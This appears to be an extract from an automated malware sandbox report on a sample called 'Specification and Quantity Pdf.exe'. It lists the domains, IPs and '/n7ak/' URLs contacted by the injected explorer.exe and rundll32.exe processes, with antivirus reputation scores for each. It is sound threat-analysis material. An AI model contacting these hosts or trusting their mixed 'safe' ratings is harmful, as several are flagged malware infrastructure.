          https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13fcaT0%Avira URL Cloudsafe
          https://www.pollensense.com/0%Avira URL Cloudsafe
          http://www.jam-nins.com11%VirustotalBrowse
          http://www.thehandycrewcompany.com/n7ak/0%Avira URL Cloudsafe
          https://www.msn.com/en-us/news/politics/kinzinger-has-theory-about-who-next-house-speaker-will-be/vi0%Avira URL Cloudsafe
          http://www.volkovastyu.comReferer:0%Avira URL Cloudsafe
          https://www.msn.com/en-us/money/careersandeducation/student-loan-debt-forgiveness-arrives-for-some-b0%Avira URL Cloudsafe
          https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13fcaT0%VirustotalBrowse
          NameIPActiveMaliciousAntivirus DetectionReputation
          www.jam-nins.com
          203.161.60.191
          truetrueunknown
          volkovastyu.com
          78.46.88.140
          truetrueunknown
          shops.myshopify.com
          23.227.38.74
          truetrueunknown
          www.ancientshadowguilt.space
          unknown
          unknowntrueunknown
          www.1690.biz
          unknown
          unknowntrueunknown
          www.parkpeninsula.online
          unknown
          unknowntrueunknown
          www.tuktukwines.com
          unknown
          unknowntrueunknown
          www.395boulderbrookdr.com
          unknown
          unknowntrueunknown
          www.sdnaqianchuan.com
          unknown
          unknowntrueunknown
          www.supremeajock.biz
          unknown
          unknowntrueunknown
          www.playdoapp.online
          unknown
          unknowntrueunknown
          www.volkovastyu.com
          unknown
          unknowntrueunknown
          www.maximsboutique.com
          unknown
          unknowntrueunknown
          www.taxuw.com
          unknown
          unknowntrueunknown
          NameMaliciousAntivirus DetectionReputation
          http://www.tuktukwines.com/n7ak/?OrT4vp=D48xOFEPf6J&nrCxNDk=X95XYDcr/0ovQl8dFDDB2DmtDdbecE+v1errdqyRv2syAHM7RuOPKheDNorHxKs8v8dmbSYlDw==true
          • Avira URL Cloud: safe
          unknown
          http://www.tuktukwines.com/n7ak/true
          • 1%, Virustotal, Browse
          • Avira URL Cloud: safe
          unknown
          www.playdoapp.online/n7ak/true
          • Avira URL Cloud: safe
          unknown
          NameSourceMaliciousAntivirus DetectionReputation
          http://crt.sectigo.com/SectigoPublicTimeStampingCAR36.crt0#Specification and Quantity Pdf.exe, Specification and Quantity Pdf.exe.0.drfalse
          • URL Reputation: safe
          unknown
          https://api.msn.com:443/v1/news/Feed/Windows?texplorer.exe, 00000008.00000002.3754644999.0000000007276000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000000.1317815671.0000000007276000.00000004.00000001.00020000.00000000.sdmpfalse
          • 0%, Virustotal, Browse
          • Avira URL Cloud: safe
          unknown
          https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13f2DVexplorer.exe, 00000008.00000000.1317815671.00000000071FC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.3754644999.00000000071FC000.00000004.00000001.00020000.00000000.sdmpfalse
          • 0%, Virustotal, Browse
          • Avira URL Cloud: safe
          unknown
          http://www.maximsboutique.comReferer:explorer.exe, 00000008.00000003.2271381440.000000000C570000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.2275760179.000000000C571000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.3081397650.000000000C571000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.3764856362.000000000C574000.00000004.00000001.00020000.00000000.sdmpfalse
          • Avira URL Cloud: safe
          unknown
          http://www.tuktukwines.com/n7ak/www.playdoapp.onlineexplorer.exe, 00000008.00000003.2271381440.000000000C570000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.2275760179.000000000C571000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.3081397650.000000000C571000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.3764856362.000000000C574000.00000004.00000001.00020000.00000000.sdmpfalse
          • 6%, Virustotal, Browse
          • Avira URL Cloud: safe
          unknown
          http://www.taxuw.com/n7ak/www.jam-nins.comexplorer.exe, 00000008.00000003.2271381440.000000000C570000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.2275760179.000000000C571000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.3081397650.000000000C571000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.3764856362.000000000C574000.00000004.00000001.00020000.00000000.sdmptrue
          • Avira URL Cloud: malware
          unknown
          https://www.msn.com/en-us/sports/other/simone-biles-leads-u-s-women-s-team-to-seventh-straight-worldexplorer.exe, 00000008.00000000.1317815671.00000000071FC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.3754644999.00000000071FC000.00000004.00000001.00020000.00000000.sdmpfalse
          • Avira URL Cloud: safe
          unknown
          https://api.msn.com:443/v1/news/Feed/Windows?explorer.exe, 00000008.00000000.1317815671.00000000071FC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.3754644999.00000000071FC000.00000004.00000001.00020000.00000000.sdmpfalse
          • 0%, Virustotal, Browse
          • Avira URL Cloud: safe
          unknown
          https://hg.mozilla.org/releases/mozilla-release/rev/68e4c357d26c5a1f075a1ec0c696d4fe684ed881rundll32.exe, 0000000A.00000003.1506733519.0000000005643000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000A.00000003.1557665455.0000000005EF0000.00000004.00000020.00020000.00000000.sdmpfalse
          • 0%, Virustotal, Browse
          • Avira URL Cloud: safe
          unknown
          https://www.msn.com/en-us/weather/topstories/here-s-who-could-see-above-average-snowfall-this-winterexplorer.exe, 00000008.00000000.1317815671.00000000071FC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.3754644999.00000000071FC000.00000004.00000001.00020000.00000000.sdmpfalse
          • Avira URL Cloud: safe
          unknown
          http://www.395boulderbrookdr.com/n7ak/explorer.exe, 00000008.00000003.2271381440.000000000C570000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.2275760179.000000000C571000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.3081397650.000000000C571000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.3764856362.000000000C574000.00000004.00000001.00020000.00000000.sdmpfalse
          • 1%, Virustotal, Browse
          • Avira URL Cloud: safe
          unknown
          http://www.playdoapp.onlineReferer:explorer.exe, 00000008.00000003.2271381440.000000000C570000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.2275760179.000000000C571000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.3081397650.000000000C571000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.3764856362.000000000C574000.00000004.00000001.00020000.00000000.sdmpfalse
          • Avira URL Cloud: safe
          unknown
          http://www.volkovastyu.comexplorer.exe, 00000008.00000003.2271381440.000000000C570000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.2275760179.000000000C571000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.3081397650.000000000C571000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.3764856362.000000000C574000.00000004.00000001.00020000.00000000.sdmpfalse
          • 1%, Virustotal, Browse
          • Avira URL Cloud: safe
          unknown
          https://excel.office.comexplorer.exe, 00000008.00000000.1337456269.000000000C091000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.3762420609.000000000C091000.00000004.00000001.00020000.00000000.sdmpfalse
          • 0%, Virustotal, Browse
          • Avira URL Cloud: safe
          unknown
          https://www.msn.com/en-us/money/realestate/why-this-florida-city-is-a-safe-haven-from-hurricanes/ar-explorer.exe, 00000008.00000000.1317815671.00000000071FC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.3754644999.00000000071FC000.00000004.00000001.00020000.00000000.sdmpfalse
          • Avira URL Cloud: safe
          unknown
          http://www.supremeajock.biz/n7ak/www.1690.bizexplorer.exe, 00000008.00000003.2271381440.000000000C570000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.2275760179.000000000C571000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.3081397650.000000000C571000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.3764856362.000000000C574000.00000004.00000001.00020000.00000000.sdmpfalse
          • Avira URL Cloud: malware
          unknown
          http://www.maximsboutique.com/n7ak/www.tuktukwines.comexplorer.exe, 00000008.00000003.2271381440.000000000C570000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.2275760179.000000000C571000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.3081397650.000000000C571000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.3764856362.000000000C574000.00000004.00000001.00020000.00000000.sdmpfalse
          • Avira URL Cloud: malware
          unknown
          https://deff.nelreports.net/api/repXexplorer.exe, 00000008.00000002.3757784608.0000000008F4D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000000.1323539837.0000000008F4D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.3081808656.0000000008F4D000.00000004.00000001.00020000.00000000.sdmpfalse
          • Avira URL Cloud: safe
          unknown
          http://www.1690.biz/n7ak/explorer.exe, 00000008.00000003.2271381440.000000000C570000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.2275760179.000000000C571000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.3081397650.000000000C571000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.3764856362.000000000C574000.00000004.00000001.00020000.00000000.sdmpfalse
          • 1%, Virustotal, Browse
          • Avira URL Cloud: safe
          unknown
          http://www.supremeajock.biz/n7ak/explorer.exe, 00000008.00000003.2271381440.000000000C570000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.2275760179.000000000C571000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.3081397650.000000000C571000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.3764856362.000000000C574000.00000004.00000001.00020000.00000000.sdmpfalse
          • 5%, Virustotal, Browse
          • Avira URL Cloud: malware
          unknown
          http://www.395boulderbrookdr.comReferer:explorer.exe, 00000008.00000003.2271381440.000000000C570000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.2275760179.000000000C571000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.3081397650.000000000C571000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.3764856362.000000000C574000.00000004.00000001.00020000.00000000.sdmpfalse
          • Avira URL Cloud: safe
          unknown
          https://api.msn.com/v1/news/Feed/Windows?activityId=DD4083B70FE54739AB05D6BBA3484042&timeOut=5000&ocexplorer.exe, 00000008.00000000.1317815671.00000000071FC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.3754644999.00000000071FC000.00000004.00000001.00020000.00000000.sdmpfalse
          • Avira URL Cloud: safe
          unknown
          https://wns.windows.com/explorer.exe, 00000008.00000000.1323539837.00000000090F2000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.3074408098.00000000090F2000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.2271985306.00000000090F2000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.3758469891.00000000090F2000.00000004.00000001.00020000.00000000.sdmpfalse
          • 0%, Virustotal, Browse
          • Avira URL Cloud: safe
          unknown
          http://www.gameofgem.com/n7ak/explorer.exe, 00000008.00000002.3764856362.000000000C574000.00000004.00000001.00020000.00000000.sdmpfalse
          • 6%, Virustotal, Browse
          • Avira URL Cloud: safe
          unknown
          http://www.1690.bizexplorer.exe, 00000008.00000003.2271381440.000000000C570000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.2275760179.000000000C571000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.3081397650.000000000C571000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.3764856362.000000000C574000.00000004.00000001.00020000.00000000.sdmpfalse
          • 6%, Virustotal, Browse
          • Avira URL Cloud: safe
          unknown
          http://www.ancientshadowguilt.spaceexplorer.exe, 00000008.00000003.2271381440.000000000C570000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.2275760179.000000000C571000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.3081397650.000000000C571000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.3764856362.000000000C574000.00000004.00000001.00020000.00000000.sdmpfalse
          • 1%, Virustotal, Browse
          • Avira URL Cloud: safe
          unknown
          http://www.playdoapp.online/n7ak/www.taxuw.comexplorer.exe, 00000008.00000003.2271381440.000000000C570000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.2275760179.000000000C571000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.3081397650.000000000C571000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.3764856362.000000000C574000.00000004.00000001.00020000.00000000.sdmpfalse
          • Avira URL Cloud: safe
          unknown
          http://www.maximsboutique.comexplorer.exe, 00000008.00000003.2271381440.000000000C570000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.2275760179.000000000C571000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.3081397650.000000000C571000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.3764856362.000000000C574000.00000004.00000001.00020000.00000000.sdmpfalse
          • Avira URL Cloud: malware
          unknown
          http://www.playdoapp.online/n7ak/explorer.exe, 00000008.00000003.2271381440.000000000C570000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.2275760179.000000000C571000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.3081397650.000000000C571000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.3764856362.000000000C574000.00000004.00000001.00020000.00000000.sdmpfalse
          • 8%, Virustotal, Browse
          • Avira URL Cloud: safe
          unknown
          http://www.ancientshadowguilt.space/n7ak/explorer.exe, 00000008.00000003.2271381440.000000000C570000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.2275760179.000000000C571000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.3081397650.000000000C571000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.3764856362.000000000C574000.00000004.00000001.00020000.00000000.sdmpfalse
          • 1%, Virustotal, Browse
          • Avira URL Cloud: safe
          unknown
          http://crt.sectigo.com/SectigoPublicTimeStampingRootR46.p7c0#Specification and Quantity Pdf.exe, Specification and Quantity Pdf.exe.0.drfalse
          • URL Reputation: safe
          unknown
          https://word.office.comexplorer.exe, 00000008.00000000.1337456269.000000000C091000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.3762420609.000000000C091000.00000004.00000001.00020000.00000000.sdmpfalse
          • 0%, Virustotal, Browse
          • Avira URL Cloud: safe
          unknown
          https://mozilla.org0/rundll32.exe, 0000000A.00000003.1506733519.0000000005643000.00000004.00000020.00020000.00000000.sdmpfalse
          • URL Reputation: safe
          unknown
          http://www.thehandycrewcompany.comexplorer.exe, 00000008.00000003.2271381440.000000000C570000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.2275760179.000000000C571000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.3081397650.000000000C571000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.3764856362.000000000C574000.00000004.00000001.00020000.00000000.sdmpfalse
          • 8%, Virustotal, Browse
          • Avira URL Cloud: safe
          unknown
          http://www.tuktukwines.comexplorer.exe, 00000008.00000003.2271381440.000000000C570000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.2275760179.000000000C571000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.3081397650.000000000C571000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.3764856362.000000000C574000.00000004.00000001.00020000.00000000.sdmpfalse
          • 4%, Virustotal, Browse
          • Avira URL Cloud: safe
          unknown
          https://assets.msn.com/weathermapdata/1/static/finance/1stparty/FinanceTaskbarIcons/Finance_Earningsexplorer.exe, 00000008.00000002.3754644999.00000000071FC000.00000004.00000001.00020000.00000000.sdmpfalse
          • 0%, Virustotal, Browse
          • Avira URL Cloud: safe
          unknown
          http://www.jam-nins.com/n7ak/www.sdnaqianchuan.comexplorer.exe, 00000008.00000003.2271381440.000000000C570000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.2275760179.000000000C571000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.3081397650.000000000C571000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.3764856362.000000000C574000.00000004.00000001.00020000.00000000.sdmptrue
          • 14%, Virustotal, Browse
          • Avira URL Cloud: safe
          unknown
          http://www.goodstuff.tv/n7ak/explorer.exe, 00000008.00000003.2271381440.000000000C570000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.2275760179.000000000C571000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.3081397650.000000000C571000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.3764856362.000000000C574000.00000004.00000001.00020000.00000000.sdmpfalse
          • 1%, Virustotal, Browse
          • Avira URL Cloud: safe
          unknown
          https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13fcaT-darkexplorer.exe, 00000008.00000000.1317815671.00000000071FC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.3754644999.00000000071FC000.00000004.00000001.00020000.00000000.sdmpfalse
          • 0%, Virustotal, Browse
          • Avira URL Cloud: safe
          unknown
          http://www.sdnaqianchuan.com/n7ak/www.parkpeninsula.onlineexplorer.exe, 00000008.00000003.2271381440.000000000C570000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.2275760179.000000000C571000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.3081397650.000000000C571000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.3764856362.000000000C574000.00000004.00000001.00020000.00000000.sdmpfalse
          • Avira URL Cloud: safe
          unknown
          http://www.tripskorea.com/n7ak/www.gameofgem.comexplorer.exe, 00000008.00000003.2271381440.000000000C570000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.2275760179.000000000C571000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.3081397650.000000000C571000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.3764856362.000000000C574000.00000004.00000001.00020000.00000000.sdmpfalse
          • Avira URL Cloud: safe
          unknown
          https://windows.msn.com:443/shell?osLocale=en-GB&chosenMarketReason=ImplicitNewexplorer.exe, 00000008.00000000.1317815671.00000000071FC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.3754644999.00000000071FC000.00000004.00000001.00020000.00000000.sdmpfalse
          • 0%, Virustotal, Browse
          • Avira URL Cloud: safe
          unknown
          https://outlook.comexplorer.exe, 00000008.00000000.1337456269.000000000C091000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.3762420609.000000000C091000.00000004.00000001.00020000.00000000.sdmpfalse
          • 0%, Virustotal, Browse
          • Avira URL Cloud: safe
          unknown
          http://www.parkpeninsula.onlineexplorer.exe, 00000008.00000003.2271381440.000000000C570000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.2275760179.000000000C571000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.3081397650.000000000C571000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.3764856362.000000000C574000.00000004.00000001.00020000.00000000.sdmpfalse
          • 8%, Virustotal, Browse
          • Avira URL Cloud: safe
          unknown
          http://www.parkpeninsula.onlineReferer:explorer.exe, 00000008.00000003.2271381440.000000000C570000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.2275760179.000000000C571000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.3081397650.000000000C571000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.3764856362.000000000C574000.00000004.00000001.00020000.00000000.sdmpfalse
          • Avira URL Cloud: safe
          unknown
          http://www.sdnaqianchuan.comReferer:explorer.exe, 00000008.00000003.2271381440.000000000C570000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.2275760179.000000000C571000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.3081397650.000000000C571000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.3764856362.000000000C574000.00000004.00000001.00020000.00000000.sdmpfalse
          • Avira URL Cloud: safe
          unknown
          http://www.thehandycrewcompany.comReferer:explorer.exe, 00000008.00000003.2271381440.000000000C570000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.2275760179.000000000C571000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.3081397650.000000000C571000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.3764856362.000000000C574000.00000004.00000001.00020000.00000000.sdmpfalse
          • Avira URL Cloud: safe
          unknown
          http://crl.sectigo.com/SectigoPublicTimeStampingCAR36.crl0zSpecification and Quantity Pdf.exe, Specification and Quantity Pdf.exe.0.drfalse
          • URL Reputation: safe
          unknown
          https://activity.windows.com/UserActivity.ReadWrite.CreatedByAppexplorer.exe, 00000008.00000003.3081808656.0000000008F83000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000000.1323539837.0000000008F83000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.3757784608.0000000008F83000.00000004.00000001.00020000.00000000.sdmpfalse
          • 0%, Virustotal, Browse
          • Avira URL Cloud: safe
          unknown
          https://www.msn.com/en-us/news/us/dumb-and-dumber-12-states-with-the-absolute-worst-education-in-theexplorer.exe, 00000008.00000000.1317815671.00000000071FC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.3754644999.00000000071FC000.00000004.00000001.00020000.00000000.sdmpfalse
          • Avira URL Cloud: safe
          unknown
          http://www.maximsboutique.com/n7ak/explorer.exe, 00000008.00000003.2271381440.000000000C570000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.2275760179.000000000C571000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.3081397650.000000000C571000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.3764856362.000000000C574000.00000004.00000001.00020000.00000000.sdmpfalse
          • 5%, Virustotal, Browse
          • Avira URL Cloud: malware
          unknown
          http://www.ancientshadowguilt.spaceReferer:explorer.exe, 00000008.00000003.2271381440.000000000C570000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.2275760179.000000000C571000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.3081397650.000000000C571000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.3764856362.000000000C574000.00000004.00000001.00020000.00000000.sdmpfalse
          • Avira URL Cloud: safe
          unknown
          http://www.goodstuff.tvexplorer.exe, 00000008.00000003.2271381440.000000000C570000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.2275760179.000000000C571000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.3081397650.000000000C571000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.3764856362.000000000C574000.00000004.00000001.00020000.00000000.sdmpfalse
          • 1%, Virustotal, Browse
          • Avira URL Cloud: safe
          unknown
          https://api.msn.com/v1/news/Feed/Windows?explorer.exe, 00000008.00000002.3757784608.0000000008F09000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.3081808656.0000000008F09000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000000.1323539837.0000000008F09000.00000004.00000001.00020000.00000000.sdmpfalse
          • 0%, Virustotal, Browse
          • Avira URL Cloud: safe
          unknown
          http://www.jam-nins.comexplorer.exe, 00000008.00000003.2271381440.000000000C570000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.3767349991.0000000010E79000.00000004.80000000.00040000.00000000.sdmp, explorer.exe, 00000008.00000003.2275760179.000000000C571000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.3081397650.000000000C571000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.3764856362.000000000C574000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000A.00000002.3752820809.0000000004B39000.00000004.10000000.00040000.00000000.sdmptrue
          • 11%, Virustotal, Browse
          • Avira URL Cloud: safe
          unknown
          https://www.msn.com/en-us/lifestyle/lifestyle-buzz/what-to-do-if-a-worst-case-nuclear-scenario-actuaexplorer.exe, 00000008.00000000.1317815671.00000000071FC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.3754644999.00000000071FC000.00000004.00000001.00020000.00000000.sdmpfalse
          • Avira URL Cloud: safe
          unknown
          http://www.taxuw.comReferer:explorer.exe, 00000008.00000003.2271381440.000000000C570000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.2275760179.000000000C571000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.3081397650.000000000C571000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.3764856362.000000000C574000.00000004.00000001.00020000.00000000.sdmpfalse
          • Avira URL Cloud: safe
          unknown
          http://www.jam-nins.comReferer:explorer.exe, 00000008.00000003.2271381440.000000000C570000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.2275760179.000000000C571000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.3081397650.000000000C571000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.3764856362.000000000C574000.00000004.00000001.00020000.00000000.sdmptrue
          • Avira URL Cloud: safe
          unknown
          http://ocsp.sectigo.com0Specification and Quantity Pdf.exe, Specification and Quantity Pdf.exe.0.drfalse
          • URL Reputation: safe
          unknown
          https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13fcaTexplorer.exe, 00000008.00000000.1317815671.00000000071FC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.3754644999.00000000071FC000.00000004.00000001.00020000.00000000.sdmpfalse
          • 0%, Virustotal, Browse
          • Avira URL Cloud: safe
          unknown
          https://www.pollensense.com/explorer.exe, 00000008.00000002.3754644999.00000000071A4000.00000004.00000001.00020000.00000000.sdmpfalse
          • 0%, Virustotal, Browse
          • Avira URL Cloud: safe
          unknown
          http://www.thehandycrewcompany.com/n7ak/explorer.exe, 00000008.00000003.2271381440.000000000C570000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.2275760179.000000000C571000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.3081397650.000000000C571000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.3764856362.000000000C574000.00000004.00000001.00020000.00000000.sdmpfalse
          • 1%, Virustotal, Browse
          • Avira URL Cloud: safe
          unknown
          https://www.msn.com/en-us/news/politics/kinzinger-has-theory-about-who-next-house-speaker-will-be/viexplorer.exe, 00000008.00000000.1317815671.00000000071FC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.3754644999.00000000071FC000.00000004.00000001.00020000.00000000.sdmpfalse
          • Avira URL Cloud: safe
          unknown
          http://www.volkovastyu.comReferer:explorer.exe, 00000008.00000003.2271381440.000000000C570000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.2275760179.000000000C571000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.3081397650.000000000C571000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.3764856362.000000000C574000.00000004.00000001.00020000.00000000.sdmpfalse
          • Avira URL Cloud: safe
          unknown
          https://www.msn.com/en-us/money/careersandeducation/student-loan-debt-forgiveness-arrives-for-some-bexplorer.exe, 00000008.00000000.1317815671.00000000071FC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.3754644999.00000000071FC000.00000004.00000001.00020000.00000000.sdmpfalse
          • Avira URL Cloud: safe
          unknown
          http://schemas.microexplorer.exe, 00000008.00000002.3757019252.0000000008810000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000008.00000002.3757051440.0000000008820000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000008.00000002.3756253250.0000000007C70000.00000002.00000001.00040000.00000000.sdmpfalse
          • Avira URL Cloud: safe
          unknown
          http://www.tripskorea.comexplorer.exe, 00000008.00000003.2271381440.000000000C570000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.2275760179.000000000C571000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.3081397650.000000000C571000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.3764856362.000000000C574000.00000004.00000001.00020000.00000000.sdmpfalse
          • 4%, Virustotal, Browse
          • Avira URL Cloud: safe
          unknown
